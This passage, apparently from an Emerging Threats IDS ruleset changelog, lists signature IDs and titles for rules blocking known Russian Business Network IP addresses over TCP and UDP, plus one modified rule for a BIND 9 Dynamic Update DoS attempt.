Russian Business Network IP TCP - BLOCKING (380) (emerging-rbn-BLOCK.rules) 2407759 - ET RBN Known Russian Business Network IP UDP - BLOCKING (380) (emerging-rbn-BLOCK.rules) 2407760 - ET RBN Known Russian Business Network IP TCP - BLOCKING (381) (emerging-rbn-BLOCK.rules) 2407761 - ET RBN Known Russian Business Network IP UDP - BLOCKING (381) (emerging-rbn-BLOCK.rules) 2407762 - ET RBN Known Russian Business Network IP TCP - BLOCKING (382) (emerging-rbn-BLOCK.rules) 2407763 - ET RBN Known Russian Business Network IP UDP - BLOCKING (382) (emerging-rbn-BLOCK.rules) 2407764 - ET RBN Known Russian Business Network IP TCP - BLOCKING (383) (emerging-rbn-BLOCK.rules) 2407765 - ET RBN Known Russian Business Network IP UDP - BLOCKING (383) (emerging-rbn-BLOCK.rules) 2407766 - ET RBN Known Russian Business Network IP TCP - BLOCKING (384) (emerging-rbn-BLOCK.rules) 2407767 - ET RBN Known Russian Business Network IP UDP - BLOCKING (384) (emerging-rbn-BLOCK.rules) 2407768 - ET RBN Known Russian Business Network IP TCP - BLOCKING (385) (emerging-rbn-BLOCK.rules) 2407769 - ET RBN Known Russian Business Network IP UDP - BLOCKING (385) (emerging-rbn-BLOCK.rules) 2407770 - ET RBN Known Russian Business Network IP TCP - BLOCKING (386) (emerging-rbn-BLOCK.rules) 2407771 - ET RBN Known Russian Business Network IP UDP - BLOCKING (386) (emerging-rbn-BLOCK.rules) 2407772 - ET RBN Known Russian Business Network IP TCP - BLOCKING (387) (emerging-rbn-BLOCK.rules) 2407773 - ET RBN Known Russian Business Network IP UDP - BLOCKING (387) (emerging-rbn-BLOCK.rules) 2407774 - ET RBN Known Russian Business Network IP TCP - BLOCKING (388) (emerging-rbn-BLOCK.rules) 2407775 - ET RBN Known Russian Business Network IP UDP - BLOCKING (388) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2009701 - ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt (emerging.rules) 2406000 - ET RBN Known Russian Business Network IP TCP (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business 
Network IP UDP (1) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network IP TCP (2) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network IP UDP (2) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network IP TCP (3) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network IP UDP (3) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network IP TCP (4) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network IP UDP (4) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network IP TCP (5) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network IP UDP (5) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network IP TCP (6) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network IP UDP (6) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network IP TCP (7) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network IP UDP (7) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network IP TCP (8) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network IP UDP (8) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network IP TCP (9) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network IP UDP (9) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network IP TCP (10) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network IP UDP (10) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network IP TCP (11) (emerging-rbn.rules) 2406021 - ET RBN Known Russian Business Network IP UDP (11) (emerging-rbn.rules) 2406022 - ET RBN Known Russian Business Network IP TCP (12) (emerging-rbn.rules) 2406023 - ET RBN Known Russian Business Network IP UDP (12) (emerging-rbn.rules) 2406024 - ET RBN Known Russian Business Network IP TCP (13) (emerging-rbn.rules) 2406025 - ET RBN Known Russian Business Network IP UDP (13) (emerging-rbn.rules) 2406026 - ET RBN Known Russian 
Business Network IP TCP (14) (emerging-rbn.rules) 2406027 - ET RBN Known Russian Business Network IP UDP (14) (emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network IP TCP (15) (emerging-rbn.rules) 2406029 - ET RBN Known Russian Business Network IP UDP (15) (emerging-rbn.rules) 2406030 - ET RBN Known Russian Business Network IP TCP (16) (emerging-rbn.rules) 2406031 - ET RBN Known Russian Business Network IP UDP (16) (emerging-rbn.rules) 2406032 - ET RBN Known Russian Business Network IP TCP (17) (emerging-rbn.rules) 2406033 - ET RBN Known Russian Business Network IP UDP (17) (emerging-rbn.rules) 2406034 - ET RBN Known Russian Business Network IP TCP (18) (emerging-rbn.rules) 2406035 - ET RBN Known Russian Business Network IP UDP (18) (emerging-rbn.rules) 2406036 - ET RBN Known Russian Business Network IP TCP (19) (emerging-rbn.rules) 2406037 - ET RBN Known Russian Business Network IP UDP (19) (emerging-rbn.rules) 2406038 - ET RBN Known Russian Business Network IP TCP (20) (emerging-rbn.rules) 2406039 - ET RBN Known Russian Business Network IP UDP (20) (emerging-rbn.rules) 2406040 - ET RBN Known Russian Business Network IP TCP (21) (emerging-rbn.rules) 2406041 - ET RBN Known Russian Business Network IP UDP (21) (emerging-rbn.rules) 2406042 - ET RBN Known Russian Business Network IP TCP (22) (emerging-rbn.rules) 2406043 - ET RBN Known Russian Business Network IP UDP (22) (emerging-rbn.rules) 2406044 - ET RBN Known Russian Business Network IP TCP (23) (emerging-rbn.rules) 2406045 - ET RBN Known Russian Business Network IP UDP (23) (emerging-rbn.rules) 2406046 - ET RBN Known Russian Business Network IP TCP (24) (emerging-rbn.rules) 2406047 - ET RBN Known Russian Business Network IP UDP (24) (emerging-rbn.rules) 2406048 - ET RBN Known Russian Business Network IP TCP (25) (emerging-rbn.rules) 2406049 - ET RBN Known Russian Business Network IP UDP (25) (emerging-rbn.rules) 2406050 - ET RBN Known Russian Business Network IP TCP (26) (emerging-rbn.rules) 
2406051 - ET RBN Known Russian Business Network IP UDP (26) (emerging-rbn.rules) 2406052 - ET RBN Known Russian Business Network IP TCP (27) (emerging-rbn.rules) 2406053 - ET RBN Known Russian Business Network IP UDP (27) (emerging-rbn.rules) 2406054 - ET RBN Known Russian Business Network IP TCP (28) (emerging-rbn.rules) 2406055 - ET RBN Known Russian Business Network IP UDP (28) (emerging-rbn.rules) 2406056 - ET RBN Known Russian Business Network IP TCP (29) (emerging-rbn.rules) 2406057 - ET RBN Known Russian Business Network IP UDP (29) (emerging-rbn.rules) 2406058 - ET RBN Known Russian Business Network IP TCP (30) (emerging-rbn.rules) 2406059 - ET RBN Known Russian Business Network IP UDP (30) (emerging-rbn.rules) 2406060 - ET RBN Known Russian Business Network IP TCP (31) (emerging-rbn.rules) 2406061 - ET RBN Known Russian Business Network IP UDP (31) (emerging-rbn.rules) 2406062 - ET RBN Known Russian Business Network IP TCP (32) (emerging-rbn.rules) 2406063 - ET RBN Known Russian Business Network IP UDP (32) (emerging-rbn.rules) 2406064 - ET RBN Known Russian Business Network IP TCP (33) (emerging-rbn.rules) 2406065 - ET RBN Known Russian Business Network IP UDP (33) (emerging-rbn.rules) 2406066 - ET RBN Known Russian Business Network IP TCP (34) (emerging-rbn.rules) 2406067 - ET RBN Known Russian Business Network IP UDP (34) (emerging-rbn.rules) 2406068 - ET RBN Known Russian Business Network IP TCP (35) (emerging-rbn.rules) 2406069 - ET RBN Known Russian Business Network IP UDP (35) (emerging-rbn.rules) 2406070 - ET RBN Known Russian Business Network IP TCP (36) (emerging-rbn.rules) 2406071 - ET RBN Known Russian Business Network IP UDP (36) (emerging-rbn.rules) 2406072 - ET RBN Known Russian Business Network IP TCP (37) (emerging-rbn.rules) 2406073 - ET RBN Known Russian Business Network IP UDP (37) (emerging-rbn.rules) 2406074 - ET RBN Known Russian Business Network IP TCP (38) (emerging-rbn.rules) 2406075 - ET RBN Known Russian Business Network IP UDP 
(38) (emerging-rbn.rules) 2406076 - ET RBN Known Russian Business Network IP TCP (39) (emerging-rbn.rules) 2406077 - ET RBN Known Russian Business Network IP UDP (39) (emerging-rbn.rules) 2406078 - ET RBN Known Russian Business Network IP TCP (40) (emerging-rbn.rules) 2406079 - ET RBN Known Russian Business Network IP UDP (40) (emerging-rbn.rules) 2406080 - ET RBN Known Russian Business Network IP TCP (41) (emerging-rbn.rules) 2406081 - ET RBN Known Russian Business Network IP UDP (41) (emerging-rbn.rules) 2406082 - ET RBN Known Russian Business Network IP TCP (42) (emerging-rbn.rules) 2406083 - ET RBN Known Russian Business Network IP UDP (42) (emerging-rbn.rules) 2406084 - ET RBN Known Russian Business Network IP TCP (43) (emerging-rbn.rules) 2406085 - ET RBN Known Russian Business Network IP UDP (43) (emerging-rbn.rules) 2406086 - ET RBN Known Russian Business Network IP TCP (44) (emerging-rbn.rules) 2406087 - ET RBN Known Russian Business Network IP UDP (44) (emerging-rbn.rules) 2406088 - ET RBN Known Russian Business Network IP TCP (45) (emerging-rbn.rules) 2406089 - ET RBN Known Russian Business Network IP UDP (45) (emerging-rbn.rules) 2406090 - ET RBN Known Russian Business Network IP TCP (46) (emerging-rbn.rules) 2406091 - ET RBN Known Russian Business Network IP UDP (46) (emerging-rbn.rules) 2406092 - ET RBN Known Russian Business Network IP TCP (47) (emerging-rbn.rules) 2406093 - ET RBN Known Russian Business Network IP UDP (47) (emerging-rbn.rules) 2406094 - ET RBN Known Russian Business Network IP TCP (48) (emerging-rbn.rules) 2406095 - ET RBN Known Russian Business Network IP UDP (48) (emerging-rbn.rules) 2406096 - ET RBN Known Russian Business Network IP TCP (49) (emerging-rbn.rules) 2406097 - ET RBN Known Russian Business Network IP UDP (49) (emerging-rbn.rules) 2406098 - ET RBN Known Russian Business Network IP TCP (50) (emerging-rbn.rules) 2406099 - ET RBN Known Russian Business Network IP UDP (50) (emerging-rbn.rules) 2406100 - ET RBN Known 
Russian Business Network IP TCP (51) (emerging-rbn.rules) 2406101 - ET RBN Known Russian Business Network IP UDP (51) (emerging-rbn.rules) 2406102 - ET RBN Known Russian Business Network IP TCP (52) (emerging-rbn.rules) 2406103 - ET RBN Known Russian Business Network IP UDP (52) (emerging-rbn.rules) 2406104 - ET RBN Known Russian Business Network IP TCP (53) (emerging-rbn.rules) 2406105 - ET RBN Known Russian Business Network IP UDP (53) (emerging-rbn.rules) 2406106 - ET RBN Known Russian Business Network IP TCP (54) (emerging-rbn.rules) 2406107 - ET RBN Known Russian Business Network IP UDP (54) (emerging-rbn.rules) 2406108 - ET RBN Known Russian Business Network IP TCP (55) (emerging-rbn.rules) 2406109 - ET RBN Known Russian Business Network IP UDP (55) (emerging-rbn.rules) 2406110 - ET RBN Known Russian Business Network IP TCP (56) (emerging-rbn.rules) 2406111 - ET RBN Known Russian Business Network IP UDP (56) (emerging-rbn.rules) 2406112 - ET RBN Known Russian Business Network IP TCP (57) (emerging-rbn.rules) 2406113 - ET RBN Known Russian Business Network IP UDP (57) (emerging-rbn.rules) 2406114 - ET RBN Known Russian Business Network IP TCP (58) (emerging-rbn.rules) 2406115 - ET RBN Known Russian Business Network IP UDP (58) (emerging-rbn.rules) 2406116 - ET RBN Known Russian Business Network IP TCP (59) (emerging-rbn.rules) 2406117 - ET RBN Known Russian Business Network IP UDP (59) (emerging-rbn.rules) 2406118 - ET RBN Known Russian Business Network IP TCP (60) (emerging-rbn.rules) 2406119 - ET RBN Known Russian Business Network IP UDP (60) (emerging-rbn.rules) 2406120 - ET RBN Known Russian Business Network IP TCP (61) (emerging-rbn.rules) 2406121 - ET RBN Known Russian Business Network IP UDP (61) (emerging-rbn.rules) 2406122 - ET RBN Known Russian Business Network IP TCP (62) (emerging-rbn.rules) 2406123 - ET RBN Known Russian Business Network IP UDP (62) (emerging-rbn.rules) 2406124 - ET RBN Known Russian Business Network IP TCP (63) 
(emerging-rbn.rules) 2406125 - ET RBN Known Russian Business Network IP UDP (63) (emerging-rbn.rules) 2406126 - ET RBN Known Russian Business Network IP TCP (64) (emerging-rbn.rules) 2406127 - ET RBN Known Russian Business Network IP UDP (64) (emerging-rbn.rules) 2406128 - ET RBN Known Russian Business Network IP TCP (65) (emerging-rbn.rules) 2406129 - ET RBN Known Russian Business Network IP UDP (65) (emerging-rbn.rules) 2406130 - ET RBN Known Russian Business Network IP TCP (66) (emerging-rbn.rules) 2406131 - ET RBN Known Russian Business Network IP UDP (66) (emerging-rbn.rules) 2406132 - ET RBN Known Russian Business Network IP TCP (67) (emerging-rbn.rules) 2406133 - ET RBN Known Russian Business Network IP UDP (67) (emerging-rbn.rules) 2406134 - ET RBN Known Russian Business Network IP TCP (68) (emerging-rbn.rules) 2406135 - ET RBN Known Russian Business Network IP UDP (68) (emerging-rbn.rules) 2406136 - ET RBN Known Russian Business Network IP TCP (69) (emerging-rbn.rules) 2406137 - ET RBN Known Russian Business Network IP UDP (69) (emerging-rbn.rules) 2406138 - ET RBN Known Russian Business Network IP TCP (70) (emerging-rbn.rules) 2406139 - ET RBN Known Russian Business Network IP UDP (70) (emerging-rbn.rules) 2406140 - ET RBN Known Russian Business Network IP TCP (71) (emerging-rbn.rules) 2406141 - ET RBN Known Russian Business Network IP UDP (71) (emerging-rbn.rules) 2406142 - ET RBN Known Russian Business Network IP TCP (72) (emerging-rbn.rules) 2406143 - ET RBN Known Russian Business Network IP UDP (72) (emerging-rbn.rules) 2406144 - ET RBN Known Russian Business Network IP TCP (73) (emerging-rbn.rules) 2406145 - ET RBN Known Russian Business Network IP UDP (73) (emerging-rbn.rules) 2406146 - ET RBN Known Russian Business Network IP TCP (74) (emerging-rbn.rules) 2406147 - ET RBN Known Russian Business Network IP UDP (74) (emerging-rbn.rules) 2406148 - ET RBN Known Russian Business Network IP TCP (75) (emerging-rbn.rules) 2406149 - ET RBN Known Russian 
Business Network IP UDP (75) (emerging-rbn.rules) 2406150 - ET RBN Known Russian Business Network IP TCP (76) (emerging-rbn.rules) 2406151 - ET RBN Known Russian Business Network IP UDP (76) (emerging-rbn.rules) 2406152 - ET RBN Known Russian Business Network IP TCP (77) (emerging-rbn.rules) 2406153 - ET RBN Known Russian Business Network IP UDP (77) (emerging-rbn.rules) 2406154 - ET RBN Known Russian Business Network IP TCP (78) (emerging-rbn.rules) 2406155 - ET RBN Known Russian Business Network IP UDP (78) (emerging-rbn.rules) 2406156 - ET RBN Known Russian Business Network IP TCP (79) (emerging-rbn.rules) 2406157 - ET RBN Known Russian Business Network IP UDP (79) (emerging-rbn.rules) 2406158 - ET RBN Known Russian Business Network IP TCP (80) (emerging-rbn.rules) 2406159 - ET RBN Known Russian Business Network IP UDP (80) (emerging-rbn.rules) 2406160 - ET RBN Known Russian Business Network IP TCP (81) (emerging-rbn.rules) 2406161 - ET RBN Known Russian Business Network IP UDP (81) (emerging-rbn.rules) 2406162 - ET RBN Known Russian Business Network IP TCP (82) (emerging-rbn.rules) 2406163 - ET RBN Known Russian Business Network IP UDP (82) (emerging-rbn.rules) 2406164 - ET RBN Known Russian Business Network IP TCP (83) (emerging-rbn.rules) 2406165 - ET RBN Known Russian Business Network IP UDP (83) (emerging-rbn.rules) 2406166 - ET RBN Known Russian Business Network IP TCP (84) (emerging-rbn.rules) 2406167 - ET RBN Known Russian Business Network IP UDP (84) (emerging-rbn.rules) 2406168 - ET RBN Known Russian Business Network IP TCP (85) (emerging-rbn.rules) 2406169 - ET RBN Known Russian Business Network IP UDP (85) (emerging-rbn.rules) 2406170 - ET RBN Known Russian Business Network IP TCP (86) (emerging-rbn.rules) 2406171 - ET RBN Known Russian Business Network IP UDP (86) (emerging-rbn.rules) 2406172 - ET RBN Known Russian Business Network IP TCP (87) (emerging-rbn.rules) 2406173 - ET RBN Known Russian Business Network IP UDP (87) (emerging-rbn.rules) 
2406174 - ET RBN Known Russian Business Network IP TCP (88) (emerging-rbn.rules) 2406175 - ET RBN Known Russian Business Network IP UDP (88) (emerging-rbn.rules) 2406176 - ET RBN Known Russian Business Network IP TCP (89) (emerging-rbn.rules) 2406177 - ET RBN Known Russian Business Network IP UDP (89) (emerging-rbn.rules) 2406178 - ET RBN Known Russian Business Network IP TCP (90) (emerging-rbn.rules) 2406179 - ET RBN Known Russian Business Network IP UDP (90) (emerging-rbn.rules) 2406180 - ET RBN Known Russian Business Network IP TCP (91) (emerging-rbn.rules) 2406181 - ET RBN Known Russian Business Network IP UDP (91) (emerging-rbn.rules) 2406182 - ET RBN Known Russian Business Network IP TCP (92) (emerging-rbn.rules) 2406183 - ET RBN Known Russian Business Network IP UDP (92) (emerging-rbn.rules) 2406184 - ET RBN Known Russian Business Network IP TCP (93) (emerging-rbn.rules) 2406185 - ET RBN Known Russian Business Network IP UDP (93) (emerging-rbn.rules) 2406186 - ET RBN Known Russian Business Network IP TCP (94) (emerging-rbn.rules) 2406187 - ET RBN Known Russian Business Network IP UDP (94) (emerging-rbn.rules) 2406188 - ET RBN Known Russian Business Network IP TCP (95) (emerging-rbn.rules) 2406189 - ET RBN Known Russian Business Network IP UDP (95) (emerging-rbn.rules) 2406190 - ET RBN Known Russian Business Network IP TCP (96) (emerging-rbn.rules) 2406191 - ET RBN Known Russian Business Network IP UDP (96) (emerging-rbn.rules) 2406192 - ET RBN Known Russian Business Network IP TCP (97) (emerging-rbn.rules) 2406193 - ET RBN Known Russian Business Network IP UDP (97) (emerging-rbn.rules) 2406194 - ET RBN Known Russian Business Network IP TCP (98) (emerging-rbn.rules) 2406195 - ET RBN Known Russian Business Network IP UDP (98) (emerging-rbn.rules) 2406196 - ET RBN Known Russian Business Network IP TCP (99) (emerging-rbn.rules) 2406197 - ET RBN Known Russian Business Network IP UDP (99) (emerging-rbn.rules) 2406198 - ET RBN Known Russian Business Network IP TCP 
(100) (emerging-rbn.rules) 2406199 - ET RBN Known Russian Business Network IP UDP (100) (emerging-rbn.rules) 2406200 - ET RBN Known Russian Business Network IP TCP (101) (emerging-rbn.rules) 2406201 - ET RBN Known Russian Business Network IP UDP (101) (emerging-rbn.rules) 2406202 - ET RBN Known Russian Business Network IP TCP (102) (emerging-rbn.rules) 2406203 - ET RBN Known Russian Business Network IP UDP (102) (emerging-rbn.rules) 2406204 - ET RBN Known Russian Business Network IP TCP (103) (emerging-rbn.rules) 2406205 - ET RBN Known Russian Business Network IP UDP (103) (emerging-rbn.rules) 2406206 - ET RBN Known Russian Business Network IP TCP (104) (emerging-rbn.rules) 2406207 - ET RBN Known Russian Business Network IP UDP (104) (emerging-rbn.rules) 2406208 - ET RBN Known Russian Business Network IP TCP (105) (emerging-rbn.rules) 2406209 - ET RBN Known Russian Business Network IP UDP (105) (emerging-rbn.rules) 2406210 - ET RBN Known Russian Business Network IP TCP (106) (emerging-rbn.rules) 2406211 - ET RBN Known Russian Business Network IP UDP (106) (emerging-rbn.rules) 2406212 - ET RBN Known Russian Business Network IP TCP (107) (emerging-rbn.rules) 2406213 - ET RBN Known Russian Business Network IP UDP (107) (emerging-rbn.rules) 2406214 - ET RBN Known Russian Business Network IP TCP (108) (emerging-rbn.rules) 2406215 - ET RBN Known Russian Business Network IP UDP (108) (emerging-rbn.rules) 2406216 - ET RBN Known Russian Business Network IP TCP (109) (emerging-rbn.rules) 2406217 - ET RBN Known Russian Business Network IP UDP (109) (emerging-rbn.rules) 2406218 - ET RBN Known Russian Business Network IP TCP (110) (emerging-rbn.rules) 2406219 - ET RBN Known Russian Business Network IP UDP (110) (emerging-rbn.rules) 2406220 - ET RBN Known Russian Business Network IP TCP (111) (emerging-rbn.rules) 2406221 - ET RBN Known Russian Business Network IP UDP (111) (emerging-rbn.rules) 2406222 - ET RBN Known Russian Business Network IP TCP (112) (emerging-rbn.rules) 
2406223 - ET RBN Known Russian Business Network IP UDP (112) (emerging-rbn.rules) 2406224 - ET RBN Known Russian Business Network IP TCP (113) (emerging-rbn.rules) 2406225 - ET RBN Known Russian Business Network IP UDP (113) (emerging-rbn.rules) 2406226 - ET RBN Known Russian Business Network IP TCP (114) (emerging-rbn.rules) 2406227 - ET RBN Known Russian Business Network IP UDP (114) (emerging-rbn.rules) 2406228 - ET RBN Known Russian Business Network IP TCP (115) (emerging-rbn.rules) 2406229 - ET RBN Known Russian Business Network IP UDP (115) (emerging-rbn.rules) 2406230 - ET RBN Known Russian Business Network IP TCP (116) (emerging-rbn.rules) 2406231 - ET RBN Known Russian Business Network IP UDP (116) (emerging-rbn.rules) 2406232 - ET RBN Known Russian Business Network IP TCP (117) (emerging-rbn.rules) 2406233 - ET RBN Known Russian Business Network IP UDP (117) (emerging-rbn.rules) 2406234 - ET RBN Known Russian Business Network IP TCP (118) (emerging-rbn.rules) 2406235 - ET RBN Known Russian Business Network IP UDP (118) (emerging-rbn.rules) 2406236 - ET RBN Known Russian Business Network IP TCP (119) (emerging-rbn.rules) 2406237 - ET RBN Known Russian Business Network IP UDP (119) (emerging-rbn.rules) 2406238 - ET RBN Known Russian Business Network IP TCP (120) (emerging-rbn.rules) 2406239 - ET RBN Known Russian Business Network IP UDP (120) (emerging-rbn.rules) 2406240 - ET RBN Known Russian Business Network IP TCP (121) (emerging-rbn.rules) 2406241 - ET RBN Known Russian Business Network IP UDP (121) (emerging-rbn.rules) 2406242 - ET RBN Known Russian Business Network IP TCP (122) (emerging-rbn.rules) 2406243 - ET RBN Known Russian Business Network IP UDP (122) (emerging-rbn.rules) 2406244 - ET RBN Known Russian Business Network IP TCP (123) (emerging-rbn.rules) 2406245 - ET RBN Known Russian Business Network IP UDP (123) (emerging-rbn.rules) 2406246 - ET RBN Known Russian Business Network IP TCP (124) (emerging-rbn.rules) 2406247 - ET RBN Known Russian 
Business Network IP UDP (124) (emerging-rbn.rules) 2406248 - ET RBN Known Russian Business Network IP TCP (125) (emerging-rbn.rules) 2406249 - ET RBN Known Russian Business Network IP UDP (125) (emerging-rbn.rules) 2406250 - ET RBN Known Russian Business Network IP TCP (126) (emerging-rbn.rules) 2406251 - ET RBN Known Russian Business Network IP UDP (126) (emerging-rbn.rules) 2406252 - ET RBN Known Russian Business Network IP TCP (127) (emerging-rbn.rules) 2406253 - ET RBN Known Russian Business Network IP UDP (127) (emerging-rbn.rules) 2406254 - ET RBN Known Russian Business Network IP TCP (128) (emerging-rbn.rules) 2406255 - ET RBN Known Russian Business Network IP UDP (128) (emerging-rbn.rules) 2406256 - ET RBN Known Russian Business Network IP TCP (129) (emerging-rbn.rules) 2406257 - ET RBN Known Russian Business Network IP UDP (129) (emerging-rbn.rules) 2406258 - ET RBN Known Russian Business Network IP TCP (130) (emerging-rbn.rules) 2406259 - ET RBN Known Russian Business Network IP UDP (130) (emerging-rbn.rules) 2406260 - ET RBN Known Russian Business Network IP TCP (131) (emerging-rbn.rules) 2406261 - ET RBN Known Russian Business Network IP UDP (131) (emerging-rbn.rules) 2406262 - ET RBN Known Russian Business Network IP TCP (132) (emerging-rbn.rules) 2406263 - ET RBN Known Russian Business Network IP UDP (132) (emerging-rbn.rules) 2406264 - ET RBN Known Russian Business Network IP TCP (133) (emerging-rbn.rules) 2406265 - ET RBN Known Russian Business Network IP UDP (133) (emerging-rbn.rules) 2406266 - ET RBN Known Russian Business Network IP TCP (134) (emerging-rbn.rules) 2406267 - ET RBN Known Russian Business Network IP UDP (134) (emerging-rbn.rules) 2406268 - ET RBN Known Russian Business Network IP TCP (135) (emerging-rbn.rules) 2406269 - ET RBN Known Russian Business Network IP UDP (135) (emerging-rbn.rules) 2406270 - ET RBN Known Russian Business Network IP TCP (136) (emerging-rbn.rules) 2406271 - ET RBN Known Russian Business Network IP UDP (136) 
(emerging-rbn.rules) 2406272 - ET RBN Known Russian Business Network IP TCP (137) (emerging-rbn.rules) 2406273 - ET RBN Known Russian Business Network IP UDP (137) (emerging-rbn.rules) 2406274 - ET RBN Known Russian Business Network IP TCP (138) (emerging-rbn.rules) 2406275 - ET RBN Known Russian Business Network IP UDP (138) (emerging-rbn.rules) 2406276 - ET RBN Known Russian Business Network IP TCP (139) (emerging-rbn.rules) 2406277 - ET RBN Known Russian Business Network IP UDP (139) (emerging-rbn.rules) 2406278 - ET RBN Known Russian Business Network IP TCP (140) (emerging-rbn.rules) 2406279 - ET RBN Known Russian Business Network IP UDP (140) (emerging-rbn.rules) 2406280 - ET RBN Known Russian Business Network IP TCP (141) (emerging-rbn.rules) 2406281 - ET RBN Known Russian Business Network IP UDP (141) (emerging-rbn.rules) 2406282 - ET RBN Known Russian Business Network IP TCP (142) (emerging-rbn.rules) 2406283 - ET RBN Known Russian Business Network IP UDP (142) (emerging-rbn.rules) 2406284 - ET RBN Known Russian Business Network IP TCP (143) (emerging-rbn.rules) 2406285 - ET RBN Known Russian Business Network IP UDP (143) (emerging-rbn.rules) 2406286 - ET RBN Known Russian Business Network IP TCP (144) (emerging-rbn.rules) 2406287 - ET RBN Known Russian Business Network IP UDP (144) (emerging-rbn.rules) 2406288 - ET RBN Known Russian Business Network IP TCP (145) (emerging-rbn.rules) 2406289 - ET RBN Known Russian Business Network IP UDP (145) (emerging-rbn.rules) 2406290 - ET RBN Known Russian Business Network IP TCP (146) (emerging-rbn.rules) 2406291 - ET RBN Known Russian Business Network IP UDP (146) (emerging-rbn.rules) 2406292 - ET RBN Known Russian Business Network IP TCP (147) (emerging-rbn.rules) 2406293 - ET RBN Known Russian Business Network IP UDP (147) (emerging-rbn.rules) 2406294 - ET RBN Known Russian Business Network IP TCP (148) (emerging-rbn.rules) 2406295 - ET RBN Known Russian Business Network IP UDP (148) (emerging-rbn.rules) 2406296 - 
ET RBN Known Russian Business Network IP TCP (149) (emerging-rbn.rules) 2406297 - ET RBN Known Russian Business Network IP UDP (149) (emerging-rbn.rules) 2406298 - ET RBN Known Russian Business Network IP TCP (150) (emerging-rbn.rules) 2406299 - ET RBN Known Russian Business Network IP UDP (150) (emerging-rbn.rules) 2406300 - ET RBN Known Russian Business Network IP TCP (151) (emerging-rbn.rules) 2406301 - ET RBN Known Russian Business Network IP UDP (151) (emerging-rbn.rules) 2406302 - ET RBN Known Russian Business Network IP TCP (152) (emerging-rbn.rules) 2406303 - ET RBN Known Russian Business Network IP UDP (152) (emerging-rbn.rules) 2406304 - ET RBN Known Russian Business Network IP TCP (153) (emerging-rbn.rules) 2406305 - ET RBN Known Russian Business Network IP UDP (153) (emerging-rbn.rules) 2406306 - ET RBN Known Russian Business Network IP TCP (154) (emerging-rbn.rules) 2406307 - ET RBN Known Russian Business Network IP UDP (154) (emerging-rbn.rules) 2406308 - ET RBN Known Russian Business Network IP TCP (155) (emerging-rbn.rules) 2406309 - ET RBN Known Russian Business Network IP UDP (155) (emerging-rbn.rules) 2406310 - ET RBN Known Russian Business Network IP TCP (156) (emerging-rbn.rules) 2406311 - ET RBN Known Russian Business Network IP UDP (156) (emerging-rbn.rules) 2406312 - ET RBN Known Russian Business Network IP TCP (157) (emerging-rbn.rules) 2406313 - ET RBN Known Russian Business Network IP UDP (157) (emerging-rbn.rules) 2406314 - ET RBN Known Russian Business Network IP TCP (158) (emerging-rbn.rules) 2406315 - ET RBN Known Russian Business Network IP UDP (158) (emerging-rbn.rules) 2406316 - ET RBN Known Russian Business Network IP TCP (159) (emerging-rbn.rules) 2406317 - ET RBN Known Russian Business Network IP UDP (159) (emerging-rbn.rules) 2406318 - ET RBN Known Russian Business Network IP TCP (160) (emerging-rbn.rules) 2406319 - ET RBN Known Russian Business Network IP UDP (160) (emerging-rbn.rules) 2406320 - ET RBN Known Russian Business 
Network IP TCP (161) (emerging-rbn.rules) 2406321 - ET RBN Known Russian Business Network IP UDP (161) (emerging-rbn.rules) 2406322 - ET RBN Known Russian Business Network IP TCP (162) (emerging-rbn.rules) 2406323 - ET RBN Known Russian Business Network IP UDP (162) (emerging-rbn.rules) 2406324 - ET RBN Known Russian Business Network IP TCP (163) (emerging-rbn.rules) 2406325 - ET RBN Known Russian Business Network IP UDP (163) (emerging-rbn.rules) 2406326 - ET RBN Known Russian Business Network IP TCP (164) (emerging-rbn.rules) 2406327 - ET RBN Known Russian Business Network IP UDP (164) (emerging-rbn.rules) 2406328 - ET RBN Known Russian Business Network IP TCP (165) (emerging-rbn.rules) 2406329 - ET RBN Known Russian Business Network IP UDP (165) (emerging-rbn.rules) 2406330 - ET RBN Known Russian Business Network IP TCP (166) (emerging-rbn.rules) 2406331 - ET RBN Known Russian Business Network IP UDP (166) (emerging-rbn.rules) 2406332 - ET RBN Known Russian Business Network IP TCP (167) (emerging-rbn.rules) 2406333 - ET RBN Known Russian Business Network IP UDP (167) (emerging-rbn.rules) 2406334 - ET RBN Known Russian Business Network IP TCP (168) (emerging-rbn.rules) 2406335 - ET RBN Known Russian Business Network IP UDP (168) (emerging-rbn.rules) 2406336 - ET RBN Known Russian Business Network IP TCP (169) (emerging-rbn.rules) 2406337 - ET RBN Known Russian Business Network IP UDP (169) (emerging-rbn.rules) 2406338 - ET RBN Known Russian Business Network IP TCP (170) (emerging-rbn.rules) 2406339 - ET RBN Known Russian Business Network IP UDP (170) (emerging-rbn.rules) 2406340 - ET RBN Known Russian Business Network IP TCP (171) (emerging-rbn.rules) 2406341 - ET RBN Known Russian Business Network IP UDP (171) (emerging-rbn.rules) 2406342 - ET RBN Known Russian Business Network IP TCP (172) (emerging-rbn.rules) 2406343 - ET RBN Known Russian Business Network IP UDP (172) (emerging-rbn.rules) 2406344 - ET RBN Known Russian Business Network IP TCP (173) 
